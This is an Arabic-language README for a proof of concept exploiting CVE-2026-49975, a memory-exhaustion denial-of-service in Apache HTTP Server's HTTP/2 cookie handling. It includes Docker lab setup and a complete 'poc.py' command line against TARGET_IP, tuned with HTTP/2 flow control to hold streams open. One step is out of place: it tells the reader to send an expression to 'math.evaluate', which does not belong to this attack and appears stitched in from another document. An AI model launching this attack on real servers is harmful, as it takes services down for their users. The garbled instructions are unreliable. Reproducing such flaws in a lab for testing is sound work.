
HTTP2-Bomb
★ CVE-2026-49975 إثبات المفهوم لقنبلة HTTP/2 ★
CVE-2026-49975 هو ثغرة حرمان من الخدمة (DoS) في خادم Apache HTTP. تحدث الثغرة في مسار معالجة طلبات HTTP/2، حيث يمكن دمج حقول
cookieالمتعددة دون أن تُحتسب بشكل صحيح ضمنLimitRequestFields. من خلال إرسال طلب HTTP/2 صغير مشفّر بـ HPACK والذي يتوسع إلى العديد من حقولcookie، يمكن للمهاجم إجبار الخادم على تخصيص ذاكرة بشكل متكرر أثناء دمج رؤوس Cookie. يمكن للمهاجم بعد ذلك استخدام التحكم في تدفق HTTP/2 لتأخير إرسال الردود، مما يبقي التدفقات المتأثرة مفتوحة ويمنع تحرير الذاكرة المخصصة.
| الفئة | الإصدار |
|---|---|
| قابلة للثغرة | Apache HTTP Server 2.4.17 ≤ الإصدار ≤ 2.4.67 |
| مصححة | Apache HTTP Server 2.4.68 أو أحدث |
قم ببناء وتشغيل بيئة خادم Apache HTTP القابلة للثغرة.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
بعد تشغيل البيئة القابلة للثغرة، اتبع الخطوات أدناه لإعادة إنتاج الهجوم.
docker stats cve-2026-49975
مثال على المخرجات:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
أرسل التعبير التالي إلى math.evaluate (على سبيل المثال، من خلال إدخال الحساب في التطبيق).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
تحقق من زيادة استخدام ذاكرة حاوية Apache وبقائها مرتفعة أثناء إبقاء تدفقات الهجوم مفتوحة.